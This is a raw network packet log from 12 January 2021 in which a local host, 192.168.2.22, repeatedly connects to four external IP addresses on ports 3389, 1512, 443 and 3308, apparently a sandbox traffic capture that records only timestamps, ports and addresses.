Jan 12, 2021 07:40:41.731794119 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.750895977 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.750947952 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.751074076 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.759136915 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.820617914 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.820822001 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.827378035 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.827537060 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.881278992 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.881534100 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.920185089 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.935580015 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.935607910 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:42.026129961 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:42.026165009 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:42.026321888 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:42.030713081 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:42.084794044 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:42.137759924 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.191144943 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.193059921 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.194462061 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.247539997 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.254512072 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.254539013 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.254595041 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.254944086 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.263221025 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.317329884 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.317461014 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.324872017 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.325016975 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.377886057 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.378035069 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.417584896 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.431047916 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.531598091 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.531675100 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.531913996 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.538356066 CET	49257	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:42.591420889 CET	1512	49257	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:42.653909922 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.706013918 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.706147909 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.707380056 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.759382963 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.774066925 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.774159908 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.791286945 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.845655918 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.845961094 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.851665974 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.851980925 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.903830051 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.903934956 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:42.942842007 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.956238031 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:42.956285954 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:43.074440002 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:43.074466944 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:43.074697971 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:43.080374956 CET	49258	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:43.132571936 CET	443	49258	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:43.198719978 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.241854906 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.241942883 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.243036985 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.286024094 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.296962023 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.296983004 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.297071934 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.308514118 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.353363991 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.353511095 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.363632917 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.363887072 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.407016993 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.407229900 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.450359106 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.562556028 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.562591076 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.562772989 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.565838099 CET	49259	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:43.608830929 CET	3308	49259	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:43.685048103 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.739085913 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.739181995 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.740320921 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.794085979 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.811516047 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.811541080 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.811609030 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.811646938 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.819354057 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.878468990 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.878699064 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.884968996 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.885127068 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.938709974 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.939008951 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:43.977968931 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.992683887 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:43.992711067 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:44.083599091 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:44.083700895 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:44.083972931 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:44.089849949 CET	49260	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:44.143739939 CET	3389	49260	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:44.216537952 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.269479036 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.269571066 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.270486116 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.323354006 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.330440044 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.330466986 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.330638885 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.365807056 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.419962883 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.420217037 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.529051065 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.529113054 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.582067966 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.582205057 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.621073961 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.635338068 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.635361910 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.740497112 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.740541935 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.740658045 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.743287086 CET	49261	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:44.796166897 CET	1512	49261	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:44.857656002 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:44.909574986 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:44.909704924 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:44.910387039 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:44.962063074 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:44.976768017 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:44.976865053 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.239234924 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.293445110 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:45.293673992 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.299119949 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.299375057 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.351041079 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:45.351222992 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.403094053 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:45.521888971 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:45.521914005 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:45.521950960 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.521972895 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.525419950 CET	49262	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:45.577209949 CET	443	49262	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:45.632500887 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:45.675689936 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:45.675823927 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:45.776012897 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:45.819083929 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:45.829838991 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:45.829864979 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:45.830044985 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.194247007 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.239161968 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.239254951 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.244729042 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.244864941 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.287970066 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.288227081 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.329003096 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.331413984 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.444485903 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.444511890 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.444634914 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.575752974 CET	49263	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:46.618962049 CET	3308	49263	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:46.678828955 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.732415915 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:46.732734919 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.756870031 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.810651064 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:46.827773094 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:46.827806950 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:46.827987909 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.834958076 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.910208941 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:46.910464048 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.991533041 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:46.991671085 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:47.047054052 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.047272921 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:47.086689949 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.101193905 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.101236105 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.190871000 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.190901041 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.191114902 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:47.191175938 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:47.194515944 CET	49264	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:47.248050928 CET	3389	49264	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:47.308669090 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.361866951 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.362113953 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.363261938 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.416115046 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.422974110 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.423038006 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.423352957 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.436094046 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.490397930 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.490544081 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.499244928 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.499556065 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.552249908 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.552341938 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.588880062 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.605189085 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.703764915 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.703799009 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.703948021 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.706928015 CET	49265	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:47.759779930 CET	1512	49265	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:47.821619034 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:47.873958111 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:47.874139071 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:47.875165939 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:47.929148912 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:47.942837000 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:47.942929983 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:47.955878019 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.010544062 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.010747910 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.014977932 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.015142918 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.067434072 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.067615032 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.106837988 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.120120049 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.237586021 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.237608910 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.237673998 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.239842892 CET	49266	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:48.292593002 CET	443	49266	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:48.347583055 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.390814066 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.390918016 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.391556978 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.434546947 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.445080042 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.445207119 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.445255995 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.445657015 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.457629919 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.502501965 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.502707005 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.508511066 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.508716106 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.551686049 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.551915884 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.592113972 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.594959021 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.594983101 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.707247019 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.707297087 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.707482100 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.710494041 CET	49267	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:48.753624916 CET	3308	49267	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:48.819525003 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:48.878711939 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:48.878923893 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:48.880544901 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:48.936232090 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:48.960676908 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:48.960701942 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:48.960757017 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:48.971333981 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.033756971 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.033977985 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.052437067 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.052488089 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.106044054 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.106268883 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.145364046 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.160303116 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.160320044 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.253109932 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.253144026 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.253357887 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.256649971 CET	49268	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:49.310488939 CET	3389	49268	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:49.364986897 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.417782068 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.417907953 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.419279099 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.471995115 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.478760958 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.478795052 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.478914976 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.489702940 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.543842077 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.544174910 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.555119038 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.555421114 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.608192921 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.608272076 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.644845009 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.661036968 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.764924049 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.764946938 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.765032053 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.767977953 CET	49269	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:49.820553064 CET	1512	49269	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:49.877486944 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:49.934719086 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:49.934817076 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:49.935794115 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:49.987634897 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.002372980 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.002465010 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.017543077 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.074421883 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.074666977 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.080291033 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.080507040 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.133476973 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.133671045 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.186558962 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.304853916 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.304930925 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.304972887 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.305010080 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.307229996 CET	49270	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:50.359452009 CET	443	49270	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:50.423094034 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.466248035 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.466460943 CET	49271	3308	192.168.2.22	80.86.91.27
